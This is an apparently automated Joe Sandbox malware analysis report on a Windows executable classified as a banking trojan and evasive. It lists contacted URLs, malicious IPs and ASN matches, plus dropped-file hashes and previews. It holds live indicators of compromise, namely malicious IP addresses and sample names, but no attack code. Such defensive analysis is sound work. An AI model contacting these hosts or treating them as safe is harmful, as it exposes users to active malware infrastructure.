http://45.135.48.1538	ywvz5i8kT9.exe, 00000000.00000002.494015900.000000000352F000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493826597.00000000034B6000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	low
http://www.fontbureau.com/designersPI	ywvz5i8kT9.exe, 00000000.00000003.242765497.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242615058.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.243173510.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242703586.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242282550.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242515498.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242431869.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242352869.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.243036393.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242833068.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242948918.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000019.00000003.312156143.000002196F861000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.typography.netD	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000019.00000003.290346723.000002196F830000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comva	ywvz5i8kT9.exe, 00000000.00000003.242324664.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.242402246.000000001C2B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnm	ywvz5i8kT9.exe, 00000000.00000003.236588666.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://45.135.48.153	ywvz5i8kT9.exe, 00000000.00000002.493728263.0000000003488000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002B.00000002.493479806.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	ywvz5i8kT9.exe, 00000000.00000002.493904651.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, WinPcapInstall.dll.30.dr, Packet.dll.30.dr, Packet.dll0.30.dr, wpcap.dll0.30.dr, WinPcap_4_1_3.exe.0.dr	false		high
http://www.fonts.com	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designerspD	ywvz5i8kT9.exe, 00000000.00000003.244415198.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244877834.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244699190.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244949239.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244514029.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244629442.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244791932.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.244350188.000000001C2D7000.00000004.00000020.00020000.00000000.sdmp, ywvz5i8kT9.exe, 00000000.00000003.245048888.000000001C2D6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.sakkal.com	ywvz5i8kT9.exe, 00000000.00000002.495771719.000000001D4B2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000019.00000002.312561693.000002196F83D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
113.212.88.126	unknown	China		136782	PINGTAN-AS-APKirinNetworksCN	true
45.135.48.153	unknown	Germany		136782	PINGTAN-AS-APKirinNetworksCN	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	611412
Start date and time: 19/04/202216:43:09	2022-04-19 16:43:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ywvz5i8kT9 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	46
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal66.bank.troj.adwa.evad.winEXE@67/106@27/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 66.2% (good quality ratio 61.7%) Quality average: 72.1% Quality standard deviation: 30.5%
HCA Information:	Successful, ratio: 81% Number of executed functions: 110 Number of non-executed functions: 150
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 23.213.168.66
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, e1723.g.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:44:51	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PINGTAN-AS-APKirinNetworksCN	28z8ooA3oC	Get hash	malicious	Browse	196.19.196.209
	y8uLBHoe4J.exe	Get hash	malicious	Browse	62.133.35.244
	4RjVkoQ93E	Get hash	malicious	Browse	103.96.171.168
	vcredist_2010.exe	Get hash	malicious	Browse	113.212.88.60
	v.exe	Get hash	malicious	Browse	113.212.88.60
	okIQd4f03Z.exe	Get hash	malicious	Browse	113.212.88.60
	cs.exe	Get hash	malicious	Browse	103.96.131.29
	7k6FKvDl0x	Get hash	malicious	Browse	103.96.162.138
	http://46.101.152.151/?email=michael.little@austalusa.com	Get hash	malicious	Browse	45.14.64.77
	Receipt_Info_158381082.doc	Get hash	malicious	Browse	103.108.120.115
	430#U0437.js	Get hash	malicious	Browse	103.102.234.156
	40INVOICE BTS_Pdf.exe	Get hash	malicious	Browse	103.115.164.122
	nfg_updsu.exe	Get hash	malicious	Browse	103.111.53.126
	vnc.exe	Get hash	malicious	Browse	103.123.100.15
	100BANK TRANSFAR SLIP.pdf.exe	Get hash	malicious	Browse	103.103.197.38
	Fax.doc	Get hash	malicious	Browse	103.111.53.126
	share.bigfiles.exe	Get hash	malicious	Browse	103.110.91.118
	ttcv.exe	Get hash	malicious	Browse	103.111.53.126
	46INV-766M453282.doc	Get hash	malicious	Browse	103.104.196.74
	46INV-766M453282.doc	Get hash	malicious	Browse	103.104.196.74
PINGTAN-AS-APKirinNetworksCN	28z8ooA3oC	Get hash	malicious	Browse	196.19.196.209
	y8uLBHoe4J.exe	Get hash	malicious	Browse	62.133.35.244
	4RjVkoQ93E	Get hash	malicious	Browse	103.96.171.168
	vcredist_2010.exe	Get hash	malicious	Browse	113.212.88.60
	v.exe	Get hash	malicious	Browse	113.212.88.60
	okIQd4f03Z.exe	Get hash	malicious	Browse	113.212.88.60
	cs.exe	Get hash	malicious	Browse	103.96.131.29
	7k6FKvDl0x	Get hash	malicious	Browse	103.96.162.138
	http://46.101.152.151/?email=michael.little@austalusa.com	Get hash	malicious	Browse	45.14.64.77
	Receipt_Info_158381082.doc	Get hash	malicious	Browse	103.108.120.115
	430#U0437.js	Get hash	malicious	Browse	103.102.234.156
	40INVOICE BTS_Pdf.exe	Get hash	malicious	Browse	103.115.164.122
	nfg_updsu.exe	Get hash	malicious	Browse	103.111.53.126
	vnc.exe	Get hash	malicious	Browse	103.123.100.15
	100BANK TRANSFAR SLIP.pdf.exe	Get hash	malicious	Browse	103.103.197.38
	Fax.doc	Get hash	malicious	Browse	103.111.53.126
	share.bigfiles.exe	Get hash	malicious	Browse	103.110.91.118
	ttcv.exe	Get hash	malicious	Browse	103.111.53.126
	46INV-766M453282.doc	Get hash	malicious	Browse	103.104.196.74
	46INV-766M453282.doc	Get hash	malicious	Browse	103.104.196.74

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\4863269369430a9b27\1028\SetupResources.dll	vcredist_2010.exe	Get hash	malicious	Browse
	vcredist_2010(1).exe	Get hash	malicious	Browse
	v.exe	Get hash	malicious	Browse
	okIQd4f03Z.exe	Get hash	malicious	Browse
	examshieldlauncher.exe	Get hash	malicious	Browse
	http://www.wacom.com/services/wacom/get-download-url.aspx?plat=win&dver=6.3.20-2&dt=drivers&redirect=true	Get hash	malicious	Browse
C:\4863269369430a9b27\1031\SetupResources.dll	vcredist_2010.exe	Get hash	malicious	Browse
	vcredist_2010(1).exe	Get hash	malicious	Browse
	v.exe	Get hash	malicious	Browse
	okIQd4f03Z.exe	Get hash	malicious	Browse
	examshieldlauncher.exe	Get hash	malicious	Browse
	http://www.wacom.com/services/wacom/get-download-url.aspx?plat=win&dver=6.3.20-2&dt=drivers&redirect=true	Get hash	malicious	Browse

Created / dropped Files

C:\4863269369430a9b27\$shtdwn$.req

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	data
Category:	dropped
Size (bytes):	788
Entropy (8bit):	0.09823380614560741
Encrypted:	false
SSDEEP:	3:lbll/:lB
MD5:	DF7119A5D3CAEDA80BF0FB6F8E53DE8F
SHA1:	76458E1D2E0FA4519FACB71A5F23F8799713BE2B
SHA-256:	3C418A401CBE09F64EDE6E598C5CA36717830446147C8EF6327168EDC7B1CB0C
SHA-512:	85142D1942111783303FA060348BC76B1DD361336DCCC9DC9CDD3432EC6CF215756CBA66A367E560C9D5719BA4F585434319A66D9A97D9A09F5AC4A752B00B6C
Malicious:	false
Preview:	Sdwn................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1028\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	30672
Entropy (8bit):	4.293519557838441
Encrypted:	false
SSDEEP:	384:4Y2C7xDsxgg8MPN9AYy50keJzH7o3oDPnv:cxTJz7
MD5:	12DF3535E4C4EF95A8CB03FD509B5874
SHA1:	90B1F87BA02C1C89C159EBF0E1E700892B85DC39
SHA-256:	1C8132747DC33CCDB02345CBE706E65089A88FE32CF040684CA0D72BB9105119
SHA-512:	C6C8887E7023C4C1CBF849EEBD17B6AD68FC14607D1C32C0D384F951E07BFAF6B61E0639F4E5978C9E3E1D52EF8A383B62622018A26FA4066EB620F584030808
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....P.[..z._.... .x.6.4. .s^.S..!q.l.[.(W...Ps^.S.N.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....P.[..z._.... .I.A.6.4. .s^.S..!q.l.[.(W...Ps^.S.N.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.S.u.p.p.o.r.t.e.d.O.S.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."....P\Omi.\|q}.N/e.c .M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.0. ..SI.ce\|vWY.N.0"./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c.

C:\4863269369430a9b27\1028\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	13656
Entropy (8bit):	6.1255358676606155
Encrypted:	false
SSDEEP:	384:0auwLmlCW1g+/km7WpWEWkLXci2jpvpq/:0lpffjSMi2jpvpq/
MD5:	CE844D12E884B8038D4D02F060A1EC9C
SHA1:	5AFD36D615BEF86D15FE5BCA82446E1CA2A1B74A
SHA-256:	F290EF58C6B6E48C052B8F2296DA722A8501B40BAF0F5CE9DAABE011B0DDA884
SHA-512:	E1760E072AE8E1CD5C5916B9196AB8BC8E2B7F2533CDA2DAD269B64F40AA608E49BBA8FF5F952DAEA73ED3F5118654B9B807259C8C95C0CD4E29098DC9D4B7F9
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: vcredist_2010.exe, Detection: malicious, Browse Filename: vcredist_2010(1).exe, Detection: malicious, Browse Filename: v.exe, Detection: malicious, Browse Filename: okIQd4f03Z.exe, Detection: malicious, Browse Filename: examshieldlauncher.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........................................................@......x.....@.......................................... ..X...............X............................................................................................text...G...........................@..@.rsrc.... ... ......................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1028\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	16563
Entropy (8bit):	4.018763370458213
Encrypted:	false
SSDEEP:	384:32ddGEAeNy78Qh7K+PrKtLF3vKvjXEvDJivKvAvUK5CtQBuWuXGygqrbihls7oG/:lmf+qtCuqvA84h5
MD5:	A70D13852CABF5A800083E2B6581E707
SHA1:	90731A5B39CBAC28A7DBF79A56D3D8F966EF5543
SHA-256:	7A6F12DB5A1D58AA41B52299C5CE8B024E9A07683D9F37497F5280F5A2A69D19
SHA-512:	5A3FD0B962D0E367ACF73A09E44193E9D5DEA4E6844BF4CEB3F27DD8AF037FD52023534E6C4F580F6DA33EB2C76AEB69E806AC76135BE4C5C0BA5EDC7919B9B5
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset136 PMingLiU;}{\f2\froman\fprq2\fcharset0 Times New Roman;}{\f3\froman\fprq2\fcharset2 Symbol;}{\f4\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\b\f0\fs20 MICROSOFT \lang1028\f1\'b3\'6e\'c5\'e9\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\lang1046\f0 \par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1033 MICROSOFT VISUAL C++ 2010 RUNTIME LIBRARIES WITH SERVICE PACK 1\f2\par..\pard\nowidctlpar\sb120\sa120\lang1028\b0\f1\'a5\'bb\'b1\'c2\'c5\'76\'b1\'f8\'b4\'da\'ab\'59\'a4\'40\'a5\'f7\'a5\'d1\'a1\'40\'b6\'51\'a5\'ce\'a4\'e1\'bb\'50\lang1033\f0 Microsoft \lang1028\f1\'a4\'bd\'a5\'71\lang1033\f0 (\lang1028\f1\'a9\'ce\'a8\'e4\'c3\'f6\'ab\'59\'a5\'f8\'b7\'7e\lang1033\'a1\'41\lang1028\'b5\'f8\'a1\'40\'b6\'51\'a5\'ce\'a4\'e

C:\4863269369430a9b27\1031\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	41628
Entropy (8bit):	3.5773894743757726
Encrypted:	false
SSDEEP:	384:4nh+jpoHHZi8oO0GOJ2+8q6OQzxYJL/ZiITrKv:R03zzOJL/YIy
MD5:	B13FF959ADC5C3E9C4BA4C4A76244464
SHA1:	4DF793626F41B92A5BC7C54757658CE30FDAEEB1
SHA-256:	44945BC0BA4BE653D07F53E736557C51164224C8EC4E4672DFAE1280260BA73B
SHA-512:	DE78542D3BBC4C46871A8AFB50FB408A59A76F6ED67E8BE3CBA8BA41724EA08DF36400E233551B329277A7A0FE6168C5556ABE9D9A735F41B29A941250BFC4D6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".D.i.e.s.e.s. .S.e.t.u.p.p.r.o.g.r.a.m.m. .e.r.f.o.r.d.e.r.t. .e.i.n.e. .x.6.4.-.P.l.a.t.t.f.o.r.m... .E.s. .k.a.n.n. .n.i.c.h.t. .a.u.f. .d.e.r. .P.l.a.t.t.f.o.r.m. .i.n.s.t.a.l.l.i.e.r.t. .w.e.r.d.e.n..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".D.i.e.s.e.s. .S.e.t.u.p.p.r.o.g.r.a.m.m. .e.r.f.o.r.d.e.r.t. .e.i.n.e. .I.A.6.4.-.P.l.a.t.t.f.o.r.m... .E.s. .k.a.n.n. .n.i.c.h.t. .a.u.f. .d.e.r. .P.l.a.t.t.f.o.r.m. .i.n.s.t.

C:\4863269369430a9b27\1031\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18264
Entropy (8bit):	5.241080166633712
Encrypted:	false
SSDEEP:	384:9Qo6s3rhGrcHN/USYvYVAFWlieW+LXci2jXHUyA:9NhCSVYvYVAFOMi2jXHU/
MD5:	C31942E7CCB510ACAE6518881734C2CC
SHA1:	6DA8EAC43422674E97AFCB04F30FED35207A8F2F
SHA-256:	446E56E32843C80F54793B14FA0E293C3B61D7F82E80D205C3CE99C77BA8B140
SHA-512:	BF16F0D9520634DCAAB4901B7E9D121CF7BB21E7CAE073E88135366514D68F60A175368308E94D7C74765B91E4946DF36BD162E53ECA2EE1E309830FE738BC35
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: vcredist_2010.exe, Detection: malicious, Browse Filename: vcredist_2010(1).exe, Detection: malicious, Browse Filename: v.exe, Detection: malicious, Browse Filename: okIQd4f03Z.exe, Detection: malicious, Browse Filename: examshieldlauncher.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l...............{%......{".....Rich............PE..L...0<_M.........."!.........................................................P............@.......................................... ..`+...........0..X............................................................................................text...G...........................@..@.rsrc....0... ...,..................@..@............0<_M........+...........RSDS..{.9..H...S-.>B....SetupResources.pdb..................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\1031\eula.rtf

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Rich Text Format data, version 1, ANSI
Category:	dropped
Size (bytes):	10303
Entropy (8bit):	5.21810340625041
Encrypted:	false
SSDEEP:	192:efr7MR0HhNXHsKiPoDD2xOwgBI/z3ksgscx6DGC7v6yOCjIOMMP8uB2:aYRgN8mD2xiEz3ksgscx6KC7SyOCjIOy
MD5:	FC11D9C5EBFE1B71E76E4D6C4C6C862F
SHA1:	909620E4EC8B27B25CD51C2546B3700B52B05250
SHA-256:	CE75A8C844501501C8F622FC5C10495E34507ACEF33A3BABE105CEAB38D2DE47
SHA-512:	EBE807EF57DDE86ED18680D51774A3F34A25D7A6CBE589BCA039EA0B1822C16B2B84FD19E91DD2AAA5EF3CC506B12F1326E285CA08554346FE0C6B44B377694F
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset2 Symbol;}{\f2\fnil\fcharset0 Calibri;}}..{\colortbl ;\red0\green0\blue255;}..{\stylesheet{ Normal;}{\s1 heading 1;}{\s2 heading 2;}}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1031\b\f0\fs20 MICROSOFT SOFTWARE: LIZENZBESTIMMUNGEN\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120 MICROSOFT \lang1033 VISUAL C++ 2010 RUNTIME LIBRARIES\lang1031 SERVICE PACK 1\par..\pard\nowidctlpar\sb120\sa120\b0 Diese Lizenzbestimmungen sind ein Vertrag zwischen Ihnen und der Microsoft Corporation (oder einer anderen Microsoft-Konzerngesellschaft, wenn diese an dem Ort, an dem Sie die Software erwerben, die Software lizenziert). Bitte lesen Sie die Lizenzbestimmungen aufmerksam durch. Sie gelten f\'fcr die der oben genannten Software und gegebenenfalls f\'fcr die Medien, auf denen Sie diese erhalten haben, sowie f\'fcr alle von Microsoft

C:\4863269369430a9b27\1033\LocalizedData.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	39246
Entropy (8bit):	3.5443015320810485
Encrypted:	false
SSDEEP:	192:4kV2hG9aXQSDpI53/aQS0WAv+VXxwVcPI/tOiQC4+3bpKQVz5FB0zJOkue6Jjfz3:4M2hJAep4tVNx9SJOkR6NXaxu
MD5:	5486FF60B072102EE3231FD743B290A1
SHA1:	D8D8A1D6BF6ADF1095158B3C9B0A296A037632D0
SHA-256:	5CA3ECAA12CA56F955D403CA93C4CB36A7D3DCDEA779FC9BDAA0CDD429DAB706
SHA-512:	AE240EAAC32EDB18FD76982FC01E03BD9C8E40A9EC1B9C42D7EBD225570B7517949E045942DBB9E40E620AA9DCC9FBE0182C6CF207AC0A44D7358AD33BA81472
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.X.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".T.h.i.s. .s.e.t.u.p. .p.r.o.g.r.a.m. .r.e.q.u.i.r.e.s. .a.n. .x.6.4. .p.l.a.t.f.o.r.m... .I.t. .c.a.n.n.o.t. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .t.h.i.s. .p.l.a.t.f.o.r.m...". ./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.I.A.6.4.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".T.h.i.s. .s.e.t.u.p. .p.r.o.g.r.a.m. .r.e.q.u.i.r.e.s. .a.n. .I.A.6.4. .p.l.a.t.f.o.r.m... .I.t. .c.a.n.n.o.t. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .t.h.i.s. .p.l.a.t.f.o.r.m...". ./.>..... . . . . . .<.T.e.x.t. .

C:\4863269369430a9b27\1033\SetupResources.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16728
Entropy (8bit):	5.268121432650481
Encrypted:	false
SSDEEP:	192:UykqnUfwTW7JoWpZeWQjp8M+9HS8bC/TJs7kFknuQKPnEtObMacxc8hjeyveCXiU:ONojWpZeW79ygC/TfFkuLXci2jpvT7
MD5:	718AB3EB3F43C9BCF16276C1EB17F2C1
SHA1:	A3091FD7784A9469309B3EDB370E24A0323E30AC
SHA-256:	E1A13F5B763D73271A1A205A88E64C6611C25D5F434CFA5DA14FEB8E4272FFAA
SHA-512:	9FA8A8D9645A9B490257C2DCE3D31F1585F6D6069F9471F9E00DFAA9E457FF1DB4C9176A91E02D7F0B61BAE0C1FC76B56061EFF04888A58AEB5AD2E8692FCF8A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
